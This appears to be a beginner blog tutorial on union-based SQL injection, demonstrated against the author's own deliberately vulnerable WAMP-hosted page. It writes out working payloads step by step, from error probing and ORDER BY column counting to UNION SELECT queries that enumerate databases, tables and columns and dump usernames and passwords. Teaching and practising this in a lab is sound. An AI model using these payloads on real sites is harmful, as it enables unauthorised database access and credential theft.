url sql injection

All posts tagged url sql injection

There are many articles on internet on SQL injection but most of them only give you queries and don’t display the ensuing result. So here, I have made a miniscule attempt to explain sql injection for beginners. For this, I have made my own webpage vulnerable to SQL injection and hosted it on Wamp server.  I hope this will be helpful for beginners to understand sql injection.

Imagine any hacker searching for sql vulnerable sites using google dorks comes to this website shown below.

sqlb1

The above is a webpage displaying some sort of information about the company’s founders.  What happens when we click on “Founder 1″? It displays some information about Founder 1 as shown below.

sqlb2

Notice that there is a small change in the url. it says id=1 at the last.  Now what if we go back and click on “Founder 2”,  it displays information about founder 2 and the url changes to ‘id=2. This implies that the webpage is using PHP $_GET query to fetch data from database.

sqlb3

Well let’s see if the webpage is vulnerable. In the address bar, add a single quote after the id=1. like below

“id=1”

sqlb4

If you get an error as shown above, then the site is vulnerable to sql injection. Since we know this site is vulnerable to sql injection, lets’ see the number of columns in the database. Use the query

id=1 order by 1 

and increase the value  until you get an error, like below.

id=1 order by 2

id=1 order by 3

The last value without the error are the number of columns present. The ‘order by’ query in SQL is used to sort the data. When no option is specified it sorts in ascending order by default. Sometimes you may not see any error no matter how much you increase the value, like the case below where I have not received an error until the value of 15.

sqlb5

Maybe there are fifteen columns ( the chances are very low though) or our query is not working. Let’s use another query.

id=1′ order by 1–+ 

We can see below that the value 3 returns us an error like below. This means there are two columns.

sqlb6

 

If the latter query works then you should use it all through the injection. The characters ‘–‘ comment the code after them.

Now we know there are  two columns. Let’s find out the vulnerable columns in the website.Type

id=-1′ union select 1,2–+ 

The vulnerable columns are displayed as below. Here both the columns are vulnerable but you may not be so lucky all the time.

sqlb7

If the above query doesn’t work, use

id=1′ and 1=2 union select 1,2–+

sqlb8

Now let’s find out the database version. We already know the number of columns. Use query,

id=-1′ union select version(),2–+

sqlb9

The version is 5.6.2-log. Now let’s find out the names of all the databases present. Use query,

id=-1′ union select group_concat(schema_name),2 from information_schema.schemata–+

This will display all the databases. You can see the list of databases present below. You can see dvwa database which I used earlier for practice.

sqlb10

We know all the databases. Now let’s see the database being used by our website. Use query,

id=-1′ union select database(),2–+

sqlb11

 

So, Shunya is the database being used by our website. Let’s see the current user.

id=-1′ union select user(),2–+

sqlb12

We know root is the default user on wamp server. Now let’s find out tables present in the ‘shunya’ database.

id=-1′ union select group_concat(table_name),2 from information_schema.tables where table_schema=database()–+

sqlb13

The table name is ‘users’. Now let’s find out the column names in the table ‘users’.

id=-1′ union select group_concat(column_name),2 from information_schema.columns where table_schema=database()–+

sqlb14

We got the column names. Now let’s dump the values of some interesting columns. Let’s dump “username” and “password” values.

id=-1′ union select group_concat(username,0x3a,password,0x3a),2 from users–+

sqlb15

We successfully dumped the usernames and passwords. The value 0x3a introduces a colon between the dumped values for readabiltiy. Now let’s dump all the values from the table ‘users’.

id=-1′ union select group_concat(id,0x3a,name,0x3a,field,0x3a,username,0x3a,password,0x3a,),2 from users–+

sqlb16

We have successfully performed sql injection and dumped the values. Hope this was helpful.